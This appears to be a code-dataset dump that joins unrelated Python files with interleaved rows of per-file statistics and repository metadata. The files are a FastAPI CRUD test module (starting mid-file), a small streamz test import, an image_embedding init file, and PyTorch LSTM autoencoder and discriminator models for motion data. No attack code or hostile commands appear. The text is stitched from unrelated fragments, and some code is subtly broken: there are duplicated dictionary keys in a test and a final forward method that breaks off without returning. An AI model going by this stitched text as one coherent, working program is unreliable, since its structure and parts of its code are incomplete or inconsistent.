test_create_many = crud_router_builder(db_session=get_transaction_session,
db_model=UntitledTable256,
crud_models=UntitledTable256Model,
prefix="/test_creation_many",
tags=["test"]
)
# Response Mode Test
# response_many = create_many_response_model['__root__'].sub_fields[0].outer_type_.__dict__['__fields__']
# for k, v in response_many.items():
# assert not v.required
UntitledTable256Model = sqlalchemy_to_pydantic(UntitledTable256,
crud_methods=[
CrudMethods.POST_REDIRECT_GET
],
exclude_columns=['bytea_value', 'xml_value', 'box_valaue'])
# Model Test
# api_model = UntitledTable256Model.__dict__['POST']
# assert api_model
# post_redirect_get_model = api_model[CrudMethods.POST_REDIRECT_GET].__dict__
# assert post_redirect_get_model['requestModel'] or post_redirect_get_model['responseModel']
# post_redirect_get_request_model = deepcopy(post_redirect_get_model['requestModel'].__dict__['__fields__'])
# post_redirect_get_response_model = deepcopy(post_redirect_get_model['responseModel'].__dict__['__fields__'])
# Request Model Test
# for k, v in post_redirect_get_request_model.items():
# sql_schema = UntitledTable256.__dict__[v.name].comparator
#
# if sql_schema.server_default or sql_schema.default:
# assert not v.required
# elif not sql_schema.nullable and sql_schema.server_default or sql_schema.default:
# assert not v.required
# elif sql_schema.nullable:
# assert not v.required
# elif not sql_schema.nullable:
# assert v.required
# elif not sql_schema.nullable and not sql_schema.server_default or not sql_schema.default:
# assert v.required
# else:
# print(f"{v.name=}")
# print(f"{v.required=}")
# print(f"{v.default=}")
# Response Model Test
# for k, v in post_redirect_get_response_model.items():
# sql_schema = UntitledTable256.__dict__[v.name].comparator
#
# if sql_schema.server_default or sql_schema.default:
# assert not v.required
# elif not sql_schema.nullable and sql_schema.server_default or sql_schema.default:
# assert not v.required
# elif sql_schema.nullable:
# assert not v.required
# elif not sql_schema.nullable:
# assert v.required
# elif not sql_schema.nullable and not sql_schema.server_default or not sql_schema.default:
# assert v.required
# else:
# print(f"{v.name=}")
# print(f"{v.required=}")
# print(f"{v.default=}")
# for k, v in post_redirect_get_response_model.items():
# assert v.required
test_post_and_redirect_get = crud_router_builder(db_session=get_transaction_session,
db_model=UntitledTable256,
crud_models=UntitledTable256Model,
prefix="/test_post_direct_get",
tags=["test"]
)
UntitledTable256Model = sqlalchemy_to_pydantic(UntitledTable256,
crud_methods=[
CrudMethods.FIND_ONE
],
exclude_columns=['bytea_value', 'xml_value', 'box_valaue'])
# # # Model Test
# api_model = UntitledTable256Model.__dict__['GET']
# assert api_model
# get_one_model = api_model[CrudMethods.FIND_ONE].__dict__
# assert get_one_model['requestModel'] or get_one_model['responseModel']
# get_one_request_model = deepcopy(get_one_model['requestModel'].__dict__['__fields__'])
# get_one_response_model = deepcopy(get_one_model['responseModel'].__dict__['__fields__'])
# primary_key_of_get_sql_schema = get_one_request_model[UntitledTable256.__dict__['primary_key_of_table']]
# assert not primary_key_of_get_sql_schema.required
# get_one_request_model.pop(UntitledTable256.__dict__['primary_key_of_table'], None)
# for k, v in get_one_request_model.items():
# assert not v.required
# # FIXME some thing may not require
# for k, v in get_one_response_model.items():
# sql_schema = UntitledTable256.__dict__[v.name].comparator
#
# if sql_schema.server_default or sql_schema.default:
# assert not v.required
# elif not sql_schema.nullable and sql_schema.server_default or sql_schema.default:
# assert not v.required
# elif sql_schema.nullable:
# assert not v.required
# elif not sql_schema.nullable:
# assert v.required
# elif not sql_schema.nullable and not sql_schema.server_default or not sql_schema.default:
# assert v.required
# else:
# print(f"{v.name=}")
# print(f"{v.required=}")
# print(f"{v.default=}")
test_get_data = crud_router_builder(db_session=get_transaction_session,
db_model=UntitledTable256,
crud_models=UntitledTable256Model,
prefix="/test",
tags=["test"]
)
UntitledTable256Model = sqlalchemy_to_pydantic(UntitledTable256,
crud_methods=[
CrudMethods.DELETE_MANY
],
exclude_columns=['bytea_value', 'xml_value', 'box_valaue'])
# # # Model Test
# api_model = UntitledTable256Model.__dict__['GET']
# assert api_model
# get_one_model = api_model[CrudMethods.FIND_ONE].__dict__
# assert get_one_model['requestModel'] or get_one_model['responseModel']
# get_one_request_model = deepcopy(get_one_model['requestModel'].__dict__['__fields__'])
# get_one_response_model = deepcopy(get_one_model['responseModel'].__dict__['__fields__'])
# primary_key_of_get_sql_schema = get_one_request_model[UntitledTable256.__dict__['primary_key_of_table']]
# assert not primary_key_of_get_sql_schema.required
# get_one_request_model.pop(UntitledTable256.__dict__['primary_key_of_table'], None)
# for k, v in get_one_request_model.items():
# assert not v.required
# # FIXME some thing may not require
# for k, v in get_one_response_model.items():
# sql_schema = UntitledTable256.__dict__[v.name].comparator
#
# if sql_schema.server_default or sql_schema.default:
# assert not v.required
# elif not sql_schema.nullable and sql_schema.server_default or sql_schema.default:
# assert not v.required
# elif sql_schema.nullable:
# assert not v.required
# elif not sql_schema.nullable:
# assert v.required
# elif not sql_schema.nullable and not sql_schema.server_default or not sql_schema.default:
# assert v.required
# else:
# print(f"{v.name=}")
# print(f"{v.required=}")
# print(f"{v.default=}")
test_delete_data = crud_router_builder(db_session=get_transaction_session,
db_model=UntitledTable256,
crud_models=UntitledTable256Model,
prefix="/test_delete_many",
tags=["test"]
)
[app.include_router(i) for i in [test_post_and_redirect_get, test_delete_data, test_create_one, test_create_many, test_get_data]]
client = TestClient(app)
primary_key_name = UntitledTable256.primary_key_of_table
unique_fields = UntitledTable256.unique_fields
def test_create_many_and_delete_many():
headers = {
'accept': 'application/json',
'Content-Type': 'application/json',
}
data = { "insert": [ { "bool_value": True, "char_value": "string", "date_value": "2021-07-24", "float4_value": 0,
"float8_value": 0, "int2_value": 0, "int4_value": 0, "int8_value": 0, "interval_value": 0,
"json_value": {}, "jsonb_value": {}, "numeric_value": 0, "text_value": "string",
"timestamp_value": "2021-07-24T02:54:53.285Z", "timestamptz_value": "2021-07-24T02:54:53.285Z",
"uuid_value": "3fa85f64-5717-4562-b3fc-2c963f66afa6", "varchar_value": "string", "array_value": [ 0 ],
"array_str__value": [ "string" ], "time_value": "18:18:18" , "timetz_value": "18:18:18+00:00"},
{"bool_value": True, "char_value": "string", "date_value": "2021-07-24", "float4_value": 0,
"float8_value": 0, "int2_value": 0, "int4_value": 0, "int8_value": 0, "interval_value": 0,
"json_value": {}, "jsonb_value": {}, "numeric_value": 0, "text_value": "string", "time_value": "18:18:18",
"timestamp_value": "2021-07-24T02:54:53.285Z",
"timestamptz_value": "2021-07-24T02:54:53.285Z",
"uuid_value": "3fa85f64-5717-4562-b3fc-2c963f66afa6", "varchar_value": "string",
"array_value": [0], "array_str__value": ["string"], "timetz_value": "18:18:18+00:00"},
{"bool_value": True, "char_value": "string", "date_value": "2021-07-24", "float4_value": 0,
"float8_value": 0, "int2_value": 0, "int4_value": 0, "int8_value": 0, "interval_value": 0,
"json_value": {}, "jsonb_value": {}, "numeric_value": 0, "text_value": "string",
"timestamp_value": "2021-07-24T02:54:53.285Z",
"timestamptz_value": "2021-07-24T02:54:53.285Z",
"uuid_value": "3fa85f64-5717-4562-b3fc-2c963f66afa6", "varchar_value": "string",
"array_value": [0], "array_str__value": ["string"], "time_value": "18:18:18", "timetz_value": "18:18:18+00:00"},
] }
response = client.post('/test_creation_many', headers=headers, data=json.dumps(data))
assert response.status_code == 201
insert_response_data = response.json()
primary_key_list = [i[primary_key_name] for i in insert_response_data]
min_key = min(primary_key_list)
max_key = max(primary_key_list)
params = {"primary_key____from": min_key,
"primary_key____to": max_key,
"bool_value____list":True,
"char_value____str": 'string%',
"char_value____str_____matching_pattern": 'case_sensitive',
"date_value____from": "2021-07-22",
"date_value____to": "2021-07-25",
"float4_value____from": -1,
"float4_value____to": 2,
"float4_value____list": 0,
"float8_value____from": -1,
"float8_value____to": 2,
"float8_value____list": 0,
"int2_value____from": -1,
"int2_value____to": 9,
"int2_value____list": 0,
"int4_value____from": -1,
"int4_value____to": 9,
"int4_value____list": 0,
"int8_value____from": -1,
"int8_value____to": 9,
"int8_value____list": 0,
"interval_value____from": -1,
"interval_value____to": 9,
"interval_value____list": 0,
"numeric_value____from": -1,
"numeric_value____to": 9,
"numeric_value____list": 0,
"text_value____list": "string",
"time_value____from": '18:18:18',
"time_value____to": '18:18:18',
"time_value____list": '18:18:18',
"timestamp_value_value____from": "2021-07-24T02:54:53.285",
"timestamp_value_value____to": "2021-07-24T02:54:53.285",
"timestamp_value_value____list": "2021-07-24T02:54:53.285",
"timestamptz_value_value____from": "2021-07-24T02:54:53.285Z",
"timestamptz_value_value____to": "2021-07-24T02:54:53.285Z",
"timestamptz_value_value____list": "2021-07-24T02:54:53.285Z",
"uuid_value_value____list": "3fa85f64-5717-4562-b3fc-2c963f66afa6",
"time_value____from": '18:18:18+00:00',
"time_value____to": '18:18:18+00:00',
"time_value____list": '18:18:18+00:00',
"varchar_value____str": 'string',
"varchar_value____str_____matching_pattern": 'case_sensitive',
"varchar_value____list": 'string',
}
from urllib.parse import urlencode
query_string = urlencode(OrderedDict(**params))
response = client.delete(f'/test_delete_many?{query_string}')
assert response.status_code == 200
assert response.headers['x-total-count'] == '3'
def test_create_many_and_delete_many_but_not_found():
headers = {
'accept': 'application/json',
'Content-Type': 'application/json',
}
data = { "insert": [ { "bool_value": True, "char_value": "string", "date_value": "2021-07-24", "float4_value": 0,
"float8_value": 0, "int2_value": 0, "int4_value": 0, "int8_value": 0, "interval_value": 0,
"json_value": {}, "jsonb_value": {}, "numeric_value": 0, "text_value": "string",
"timestamp_value": "2021-07-24T02:54:53.285", "timestamptz_value": "2021-07-24T02:54:53.285Z",
"uuid_value": "3fa85f64-5717-4562-b3fc-2c963f66afa6", "varchar_value": "string", "array_value": [ 0 ],
"array_str__value": [ "string" ], "time_value": "18:18:18" , "timetz_value": "18:18:18+00:00"},
{"bool_value": True, "char_value": "string", "date_value": "2021-07-24", "float4_value": 0,
"float8_value": 0, "int2_value": 0, "int4_value": 0, "int8_value": 0, "interval_value": 0,
"json_value": {}, "jsonb_value": {}, "numeric_value": 0, "text_value": "string", "time_value": "18:18:18",
"timestamp_value": "2021-07-24T02:54:53.285",
"timestamptz_value": "2021-07-24T02:54:53.285Z",
"uuid_value": "3fa85f64-5717-4562-b3fc-2c963f66afa6", "varchar_value": "string",
"array_value": [0], "array_str__value": ["string"], "timetz_value": "18:18:18+00:00"},
{"bool_value": True, "char_value": "string", "date_value": "2021-07-24", "float4_value": 0,
"float8_value": 0, "int2_value": 0, "int4_value": 0, "int8_value": 0, "interval_value": 0,
"json_value": {}, "jsonb_value": {}, "numeric_value": 0, "text_value": "string",
"timestamp_value": "2021-07-24T02:54:53.285",
"timestamptz_value": "2021-07-24T02:54:53.285Z",
"uuid_value": "3fa85f64-5717-4562-b3fc-2c963f66afa6", "varchar_value": "string",
"array_value": [0], "array_str__value": ["string"], "time_value": "18:18:18", "timetz_value": "18:18:18+00:00"},
] }
response = client.post('/test_creation_many', headers=headers, data=json.dumps(data))
assert response.status_code == 201
insert_response_data = response.json()
primary_key_list = [i[primary_key_name] for i in insert_response_data]
min_key = min(primary_key_list)
max_key = max(primary_key_list)
params = {"primary_key____from": min_key,
"primary_key____to": max_key,
"bool_value____list":True,
"char_value____str": 'string%',
"char_value____str_____matching_pattern": 'case_sensitive',
"date_value____from": "2021-07-22",
"date_value____to": "2021-07-25",
"float4_value____from": -1,
"float4_value____to": 2,
"float4_value____list": 0,
"float8_value____from": -1,
"float8_value____to": 2,
"float8_value____list": 0,
"int2_value____from": -1,
"int2_value____to": 9,
"int2_value____list": 0,
"int4_value____from": -1,
"int4_value____to": 9,
"int4_value____list": 0,
"int8_value____from": -1,
"int8_value____to": 9,
"int8_value____list": 0,
"interval_value____from": -1,
"interval_value____to": 9,
"interval_value____list": 0,
"numeric_value____from": -1,
"numeric_value____to": 9,
"numeric_value____list": 0,
"text_value____list": "string",
"time_value____from": '10:18:18',
"time_value____to": '12:18:18',
"time_value____list": '12:18:18',
"timestamp_value_value____from": "2021-07-24T02:54:53.285",
"timestamp_value_value____to": "2021-07-24T02:54:53.285",
"timestamp_value_value____list": "2021-07-24T02:54:53.285",
"timestamptz_value_value____from": "2021-07-24T02:54:53.285Z",
"timestamptz_value_value____to": "2021-07-24T02:54:53.285Z",
"timestamptz_value_value____list": "2021-07-24T02:54:53.285Z",
"uuid_value_value____list": "3fa85f64-5717-4562-b3fc-2c963f66afa6",
"timez_value____from": '18:18:18+00:00',
"timez_value____to": '18:18:18+00:00',
"timez_value____list": '18:18:18+00:00',
"varchar_value____str": 'string',
"varchar_value____str_____matching_pattern": 'case_sensitive',
"varchar_value____list": 'string',
}
from urllib.parse import urlencode
query_string = urlencode(OrderedDict(**params))
response = client.delete(f'/test_delete_many?{query_string}')
assert response.status_code == 204
| 52.752
| 138
| 0.579769
| 2,194
| 19,782
| 4.709207
| 0.080675
| 0.041812
| 0.025552
| 0.030197
| 0.913376
| 0.89005
| 0.879597
| 0.865079
| 0.857433
| 0.843399
| 0
| 0.08069
| 0.302093
| 19,782
| 374
| 139
| 52.893048
| 0.667681
| 0.243909
| 0
| 0.766234
| 0
| 0
| 0.358135
| 0.115379
| 0
| 0
| 0
| 0.002674
| 0.021645
| 1
| 0.008658
| false
| 0
| 0.038961
| 0
| 0.047619
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b927b629b68e7a8fba10bb4c8df026b9bb3256b5
| 109
|
py
|
Python
|
test/test_dask.py
|
xpdAcq/streamz_ext
|
9c3b41fdcca3dc7deea6d3f5523fee315af71211
|
[
"BSD-3-Clause"
] | 1
|
2018-10-02T02:37:19.000Z
|
2018-10-02T02:37:19.000Z
|
test/test_dask.py
|
xpdAcq/streamz_ext
|
9c3b41fdcca3dc7deea6d3f5523fee315af71211
|
[
"BSD-3-Clause"
] | 31
|
2018-01-17T15:54:32.000Z
|
2018-10-24T17:11:28.000Z
|
test/test_dask.py
|
xpdAcq/streamz_ext
|
9c3b41fdcca3dc7deea6d3f5523fee315af71211
|
[
"BSD-3-Clause"
] | 4
|
2018-01-16T19:27:49.000Z
|
2018-08-20T08:58:06.000Z
|
from streamz_ext.dask import *
try:
from zstreamz.tests.test_dask import *
except ImportError:
pass
| 15.571429
| 42
| 0.743119
| 15
| 109
| 5.266667
| 0.8
| 0.253165
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.192661
| 109
| 6
| 43
| 18.166667
| 0.897727
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.2
| 0.6
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
b97ee0d4e1d6bbf563e9bcf4d1a8ceca18f7d4ec
| 163
|
py
|
Python
|
image_embedding/__init__.py
|
newTypeGeek/face-recognition
|
235cf4aaf60ba3504b0e73dbab5f9dc4c7cc3dbd
|
[
"Apache-2.0"
] | 5
|
2020-02-10T04:38:40.000Z
|
2021-09-01T18:50:18.000Z
|
image_embedding/__init__.py
|
newTypeGeek/face-recognition
|
235cf4aaf60ba3504b0e73dbab5f9dc4c7cc3dbd
|
[
"Apache-2.0"
] | 1
|
2020-06-11T18:26:38.000Z
|
2020-06-11T18:26:38.000Z
|
image_embedding/__init__.py
|
newTypeGeek/face-recognition
|
235cf4aaf60ba3504b0e73dbab5f9dc4c7cc3dbd
|
[
"Apache-2.0"
] | 3
|
2019-06-24T12:30:12.000Z
|
2020-02-10T04:39:59.000Z
|
import image_embedding.gen_vec_start as gen_vec_start
import image_embedding.gen_vec_start as gen_vec_register
import image_embedding.gen_vec_start as gen_vec_add
| 40.75
| 56
| 0.907975
| 30
| 163
| 4.433333
| 0.3
| 0.270677
| 0.330827
| 0.518797
| 0.879699
| 0.879699
| 0.879699
| 0.879699
| 0.879699
| 0
| 0
| 0
| 0.07362
| 163
| 3
| 57
| 54.333333
| 0.880795
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 12
|
b9888d59363084951d8e976657780d58aa863105
| 21,696
|
py
|
Python
|
motionAE/src/models.py
|
meaten/MotionAug
|
ac7d5fa3e5ade1dffca8db50c1281e9a4a747b62
|
[
"MIT"
] | 24
|
2022-03-18T08:03:11.000Z
|
2022-03-30T05:11:26.000Z
|
motionAE/src/models.py
|
meaten/MotionAug
|
ac7d5fa3e5ade1dffca8db50c1281e9a4a747b62
|
[
"MIT"
] | 1
|
2022-03-28T06:39:46.000Z
|
2022-03-29T03:40:01.000Z
|
motionAE/src/models.py
|
meaten/MotionAug
|
ac7d5fa3e5ade1dffca8db50c1281e9a4a747b62
|
[
"MIT"
] | null | null | null |
import torch
import torch.nn as nn
torch.manual_seed(1)
class lstmEncoder_wo_Norm(nn.Module):
def __init__(self, input_len, dim, dim_z, dropout=0.0):
super(lstmEncoder_wo_Norm, self).__init__()
self.input_len = input_len
self.dim = dim
self.dim_z = dim_z
self.linear = nn.Linear(
in_features=self.dim,
out_features=self.dim_z
)
self.rnn = nn.LSTM(
input_size=self.dim_z,
hidden_size=self.dim_z * 2,
num_layers=1,
batch_first=True,
dropout=dropout,
bidirectional=True
)
self.linear1 = nn.Linear(
in_features=self.dim_z * 4,
out_features=self.dim_z * 2
)
self.linear2 = nn.Linear(
in_features=self.dim_z * 2,
out_features=self.dim_z
)
self.activation = nn.ReLU()
def forward(self, x, x_lengths):
x = self.activation(self.linear(x))
x = torch.nn.utils.rnn.pack_padded_sequence(x, x_lengths, batch_first=True, enforce_sorted=False)
out, (_, _) = self.rnn(x)
out, out_lengths = torch.nn.utils.rnn.pad_packed_sequence(out, batch_first=True)
out = torch.sum(out, dim=1) / out_lengths[:, None].type(torch.FloatTensor).cuda()
out = self.activation(self.linear1(out))
z = self.linear2(out)
return z
class lstmEncoder(nn.Module):
def __init__(self, input_len, dim, dim_z, dropout=0.0):
super(lstmEncoder, self).__init__()
self.input_len = input_len
self.dim = dim
self.dim_z = dim_z
self.linear = nn.Linear(
in_features=self.dim,
out_features=self.dim_z
)
self.norm = nn.LayerNorm([self.input_len, self.dim])
self.rnn = nn.LSTM(
input_size=self.dim_z,
hidden_size=self.dim_z * 2,
num_layers=1,
batch_first=True,
dropout=dropout,
bidirectional=True
)
self.linear1 = nn.Linear(
in_features=self.dim_z * 4,
out_features=self.dim_z * 2
)
self.linear2 = nn.Linear(
in_features=self.dim_z * 2,
out_features=self.dim_z
)
self.activation = nn.ReLU()
def forward(self, x, x_lengths):
x = self.norm(x)
x = self.activation(self.linear(x))
x = torch.nn.utils.rnn.pack_padded_sequence(x, x_lengths, batch_first=True, enforce_sorted=False)
out, (_, _) = self.rnn(x)
out, out_lengths = torch.nn.utils.rnn.pad_packed_sequence(out, batch_first=True)
out = torch.sum(out, dim=1) / out_lengths[:, None].type(torch.FloatTensor).cuda()
out = self.activation(self.linear1(out))
z = self.linear2(out)
return z
class lstmEncoder_vae(nn.Module):
def __init__(self, input_len, dim, dim_z, dropout=0.0):
super(lstmEncoder_vae, self).__init__()
self.input_len = input_len
self.dim = dim
self.dim_z = dim_z
self.linear = nn.Linear(
in_features=self.dim,
out_features=self.dim_z
)
self.norm = nn.LayerNorm([self.input_len, self.dim])
self.rnn = nn.LSTM(
input_size=self.dim_z,
hidden_size=self.dim_z * 2,
num_layers=1,
batch_first=True,
dropout=dropout,
bidirectional=True
)
self.mu_linear1 = nn.Linear(
in_features=self.dim_z * 4,
out_features=self.dim_z * 2
)
self.mu_linear2 = nn.Linear(
in_features=self.dim_z * 2,
out_features=self.dim_z
)
self.log_var_linear1 = nn.Linear(
in_features=self.dim_z * 4,
out_features=self.dim_z * 2
)
self.log_var_linear2 = nn.Linear(
in_features=self.dim_z * 2,
out_features=self.dim_z
)
self.activation = nn.ReLU()
def forward(self, x, x_lengths):
x = self.norm(x)
x = self.activation(self.linear(x))
x = torch.nn.utils.rnn.pack_padded_sequence(x, x_lengths, batch_first=True, enforce_sorted=False)
out, (_, _) = self.rnn(x)
out, out_lengths = torch.nn.utils.rnn.pad_packed_sequence(out, batch_first=True)
out = torch.sum(out, dim=1) / out_lengths[:, None].type(torch.FloatTensor).cuda()
mu = self.activation(self.mu_linear1(out))
mu = self.mu_linear2(mu)
log_var = self.activation(self.log_var_linear1(out))
log_var = self.log_var_linear2(log_var)
return [mu, log_var]
class lstmEncoder_cvae(nn.Module):
def __init__(self, input_len, dim, dim_z, class_num, dropout=0.0):
super(lstmEncoder_cvae, self).__init__()
self.input_len = input_len
self.dim = dim
self.dim_z = dim_z
self.class_num = class_num
self.linear = nn.Linear(
in_features=self.dim + self.class_num,
out_features=self.dim + self.class_num
)
# self.norm = nn.BatchNorm1d(self.dim)
self.norm = nn.LayerNorm([self.input_len, self.dim + self.class_num])
self.rnn = nn.LSTM(
input_size=self.dim + self.class_num,
hidden_size=self.dim_z * 2,
num_layers=1,
batch_first=True,
dropout=dropout,
bidirectional=True
)
self.mu_linear1 = nn.Linear(
in_features=self.dim_z * 4,
out_features=self.dim_z * 2
)
self.mu_linear2 = nn.Linear(
in_features=self.dim_z * 2,
out_features=self.dim_z
)
self.log_var_linear1 = nn.Linear(
in_features=self.dim_z * 4,
out_features=self.dim_z * 2
)
self.log_var_linear2 = nn.Linear(
in_features=self.dim_z * 2,
out_features=self.dim_z
)
self.activation = nn.ReLU()
def forward(self, x, x_lengths, class_vector):
"""
x = x.permute(0, 2, 1)
x = self.norm(x)
x = x.permute(0, 2, 1)
"""
x = torch.cat((x, class_vector[:, None, :].expand(-1, self.input_len, -1)), 2)
x = self.activation(self.linear(x))
x = self.norm(x)
x = torch.nn.utils.rnn.pack_padded_sequence(x, x_lengths, batch_first=True, enforce_sorted=False)
out, (_, _) = self.rnn(x)
out, out_lengths = torch.nn.utils.rnn.pad_packed_sequence(out, batch_first=True)
out = torch.sum(out, dim=1) / out_lengths[:, None].type(torch.FloatTensor).cuda()
mu = self.activation(self.mu_linear1(out))
mu = self.mu_linear2(mu)
log_var = self.activation(self.log_var_linear1(out))
log_var = self.log_var_linear2(log_var)
return [mu, log_var]
class Encoder_c(nn.Module):
def __init__(self, dim_z, class_num):
super(Encoder_c, self).__init__()
self.dim_z = dim_z
self.class_num = class_num
self.mu_linear1 = nn.Linear(
in_features=self.class_num,
out_features=int(self.dim_z / 2)
)
self.mu_linear2 = nn.Linear(
in_features=int(self.dim_z / 2),
out_features=self.dim_z
)
self.log_var_linear1 = nn.Linear(
in_features=self.class_num,
out_features=int(self.dim_z / 2)
)
self.log_var_linear2 = nn.Linear(
in_features=int(self.dim_z / 2),
out_features=self.dim_z
)
self.activation = nn.ReLU()
def forward(self, class_vector):
mu = self.activation(self.mu_linear1(class_vector))
mu = self.mu_linear2(mu)
log_var = self.activation(self.log_var_linear1(class_vector))
log_var = self.log_var_linear2(log_var)
return [mu, log_var]
class lstmDecoder(nn.Module):
def __init__(self, input_len, dim, dim_z, dropout=0.0):
super(lstmDecoder, self).__init__()
self.input_len = input_len
self.dim = dim
self.dim_z = dim_z
self.linear = nn.Linear(
in_features=self.dim_z,
out_features=self.dim_z
)
self.rnn = nn.LSTM(
input_size=self.dim_z,
hidden_size=self.dim_z * 2,
num_layers=1,
batch_first=True,
dropout=dropout,
bidirectional=False
)
self.linear1 = nn.Linear(
in_features=self.dim_z * 2,
out_features=self.dim_z)
self.linear2 = nn.Linear(
in_features=self.dim_z,
out_features=self.dim)
self.activation = nn.ReLU()
def forward(self, x):
x = self.activation(self.linear(x))
x = x[:, None, :].expand(-1, self.input_len, -1)
out, (_, _) = self.rnn(x)
out = self.activation(self.linear1(out))
recon = self.linear2(out)
return recon
class lstmDecoder_c(nn.Module):
def __init__(self, input_len, dim, dim_z, class_num, dropout=0.0):
super(lstmDecoder_c, self).__init__()
self.input_len = input_len
self.dim = dim
self.dim_z = dim_z
self.class_num = class_num
self.linear = nn.Linear(
in_features=self.dim_z + self.class_num,
out_features=self.dim_z + self.class_num)
self.rnn = nn.LSTM(
input_size=self.dim_z + self.class_num,
hidden_size=self.dim_z * 2,
num_layers=1,
batch_first=True,
dropout=dropout,
bidirectional=False
)
self.linear1 = nn.Linear(
in_features=self.dim_z * 2,
out_features=self.dim_z)
self.linear2 = nn.Linear(
in_features=self.dim_z,
out_features=self.dim)
self.activation = nn.ReLU()
def forward(self, x, class_vector):
x = torch.cat((x, class_vector), 1)
x = self.activation(self.linear(x))
x = x[:, None, :].expand(-1, self.input_len, -1)
out, (_, _) = self.rnn(x)
out = self.activation(self.linear1(out))
recon = self.linear2(out)
return recon
class lstmDecoder_feedback(nn.Module):
def __init__(self, input_len, dim, dim_z, dropout=0.0, residual=False):
super(lstmDecoder_feedback, self).__init__()
self.input_len = input_len
self.dim = dim
self.dim_z = dim_z
self.residual = residual
self.linear = nn.Linear(
in_features=self.dim_z,
out_features=self.dim_z
)
self.pose_linear1 = nn.Linear(
in_features=self.dim_z,
out_features=self.dim_z
)
self.pose_linear2 = nn.Linear(
in_features=self.dim_z,
out_features=self.dim
)
self.rnn_cell = nn.LSTMCell(
input_size=self.dim_z + self.dim,
hidden_size=self.dim_z * 2
)
self.linear1 = nn.Linear(
in_features=self.dim_z * 2,
out_features=self.dim_z)
self.linear2 = nn.Linear(
in_features=self.dim_z,
out_features=self.dim)
self.activation = nn.ReLU()
def forward(self, x):
outputs = []
x = self.activation(self.linear(x))
pose = self.activation(self.pose_linear1(x))
pose = self.pose_linear2(pose)
batch_size, _ = x.size()
input = torch.cat((x, pose), 1)
(h, c) = [torch.zeros(batch_size, self.dim_z * 2).cuda()] * 2
for i in range(self.input_len):
(h, c) = self.rnn_cell(input, (h, c))
h_ = self.activation(self.linear1(h))
if self.residual:
pose = self.linear2(h_) + pose
else:
pose = self.linear2(h_)
outputs += [pose]
input = torch.cat((x, pose), 1)
outputs = torch.stack(outputs, 1)
return outputs
class lstmDecoder_initfeed(nn.Module):
def __init__(self, input_len, dim, dim_z, dropout=0.0, residual=False):
super(lstmDecoder_initfeed, self).__init__()
self.input_len = input_len
self.dim = dim
self.dim_z = dim_z
self.residual = residual
self.linear = nn.Linear(
in_features=self.dim_z,
out_features=self.dim_z
)
self.rnn_cell = nn.LSTMCell(
input_size=self.dim_z + self.dim,
hidden_size=self.dim_z * 2
)
self.linear1 = nn.Linear(
in_features=self.dim_z * 2,
out_features=self.dim_z)
self.linear2 = nn.Linear(
in_features=self.dim_z,
out_features=self.dim)
self.activation = nn.ReLU()
def forward(self, x, pose):
outputs = []
x = self.activation(self.linear(x))
batch_size, _ = x.size()
input = torch.cat((x, pose), 1)
(h, c) = [torch.zeros(batch_size, self.dim_z * 2).cuda()] * 2
for i in range(self.input_len):
(h, c) = self.rnn_cell(input, (h, c))
h_ = self.activation(self.linear1(h))
if self.residual:
pose = self.linear2(h_) + pose
else:
pose = self.linear2(h_)
outputs += [pose]
input = torch.cat((x, pose), 1)
outputs = torch.stack(outputs, 1)
return outputs
class Discriminator_frame(nn.Module):
def __init__(self, dim, dim_z):
super(Discriminator_frame, self).__init__()
self.dim = dim
self.dim_z = dim_z
self.linear1 = nn.Linear(
in_features=self.dim,
out_features=self.dim_z
)
self.linear2 = nn.Linear(
in_features=self.dim_z,
out_features=1
)
self.activation = nn.ReLU()
def forward(self, x):
out = self.activation(self.linear1(x))
out = self.linear2(out)
return out
class Discriminator_seq(nn.Module):
def __init__(self, input_len, dim, dim_z, dropout=0.0):
super(Discriminator_seq, self).__init__()
self.input_len = input_len
self.dim = dim
self.dim_z = dim_z
self.norm = nn.LayerNorm([self.input_len, self.dim])
self.linear = nn.Linear(
in_features=self.dim,
out_features=self.dim_z
)
self.rnn = nn.LSTM(
input_size=self.dim_z,
hidden_size=self.dim_z * 2,
num_layers=1,
batch_first=True,
dropout=dropout,
bidirectional=True
)
self.linear1 = nn.Linear(
in_features=self.dim_z * 4,
out_features=self.dim_z
)
self.linear2 = nn.Linear(
in_features=self.dim_z,
out_features=1
)
self.activation = nn.ReLU()
def forward(self, x, x_lengths):
x = self.norm(x)
x = self.activation(self.linear(x))
x = torch.nn.utils.rnn.pack_padded_sequence(x, x_lengths, batch_first=True, enforce_sorted=False)
out, (_, _) = self.rnn(x)
out, out_lengths = torch.nn.utils.rnn.pad_packed_sequence(out, batch_first=True)
last_seq_idxs = torch.LongTensor([x - 1 for x in out_lengths])
out = torch.cat([out[:, 0, self.dim_z * 2:], # forward output
out[range(out.shape[0]), last_seq_idxs, :self.dim_z * 2]], # backward output
axis=1)
# out = torch.sum(out, dim=1) / out_lengths[:, None].type(torch.FloatTensor).cuda()
out = self.activation(self.linear1(out))
out = self.linear2(out)
return out
class Estimator_length(nn.Module):
def __init__(self, dim_z):
super(Estimator_length, self).__init__()
self.dim_z = dim_z
self.linear1 = nn.Linear(
in_features=self.dim_z,
out_features=int(self.dim_z / 4),
)
self.linear2 = nn.Linear(
in_features=int(self.dim_z / 4),
out_features=1
)
self.activation = nn.ReLU()
def forward(self, x):
x = self.activation(self.linear1(x))
